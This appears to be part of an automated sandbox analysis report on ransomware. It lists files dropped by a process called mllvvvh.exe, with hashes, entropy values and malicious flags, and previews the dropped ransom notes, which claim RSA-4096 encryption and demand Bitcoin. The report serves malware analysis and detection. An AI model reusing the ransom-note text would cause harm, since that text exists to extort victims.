                  C:\ProgramData\Adobe\ARM\Reader_19.012.20034\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):677520
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrC3
                  MD5:717F3CF5CC00702248402EDE3FDEA469
                  SHA1:D79D0F865A1184F673CF0E1C6763769483790C7A
                  SHA-256:430A9A2743CF22FF7A066C6E32AE4790E4811979DC6EC84497DB18A41EC82918
                  SHA-512:2D36B68B4FEA44A6658523DE8D51A975D0FB5A1D95496A7D10385FCBAF0F6245E65D098B44FEBE7C89B7A4BE1DC11020854D05973FF698FB06F685D1889DA8B7
                  Malicious:false
                  C:\ProgramData\Adobe\ARM\Reader_19.012.20034\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):20970
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5u
                  MD5:A80DFCF483AF64FE5C9A84D07F0AEEF1
                  SHA1:1899C0D2F95F8E9DFB915A51616594C176BCE2F7
                  SHA-256:A3F8D08D475E94FE572F87DF8EAE541973485E00A5E0245BF15DD1831AEBCC6D
                  SHA-512:1876952B061D1E6A97CE9C0C3EACC0D3CBDCBC1C95345C47FF1CAEB670E80172DC07186BFBD9DCED7E55E025311248A78F3BD1167851CA51185943CA7BF0EF1B
                  Malicious:true
                  C:\ProgramData\Adobe\ARM\S\11357\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\ARM\S\11357\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  C:\ProgramData\Adobe\ARM\S\11357\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:true
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Adobe\ARM\S\1742\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\ARM\S\1742\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  C:\ProgramData\Adobe\ARM\S\1742\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:true
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Adobe\ARM\S\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\ARM\S\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  C:\ProgramData\Adobe\ARM\S\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:true
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Adobe\ARM\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\ARM\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  C:\ProgramData\Adobe\ARM\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):70704
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkL
                  MD5:60B3A4062ABE3EA49E6EB8911977B25E
                  SHA1:E046E8388CABEAA51B3E3FF27CE6434F2A6A0562
                  SHA-256:CFF09453B6ECB0B0E2D0852C1615A4AB6074BC5AD97C38EDC31EA82A7EF58740
                  SHA-512:90F7D4F8735F24BE3FF2CE49412BE3E2497C02A3C45D1143DEF24F1B5E8A9C03F1BFAD028ACD58403725BFB98113B65C43E5EDDCF4681F0F8B3656924579CEF5
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:true
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Adobe\Setup\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\Setup\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  C:\ProgramData\Adobe\Setup\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):70704
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkL
                  MD5:60B3A4062ABE3EA49E6EB8911977B25E
                  SHA1:E046E8388CABEAA51B3E3FF27CE6434F2A6A0562
                  SHA-256:CFF09453B6ECB0B0E2D0852C1615A4AB6074BC5AD97C38EDC31EA82A7EF58740
                  SHA-512:90F7D4F8735F24BE3FF2CE49412BE3E2497C02A3C45D1143DEF24F1B5E8A9C03F1BFAD028ACD58403725BFB98113B65C43E5EDDCF4681F0F8B3656924579CEF5
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
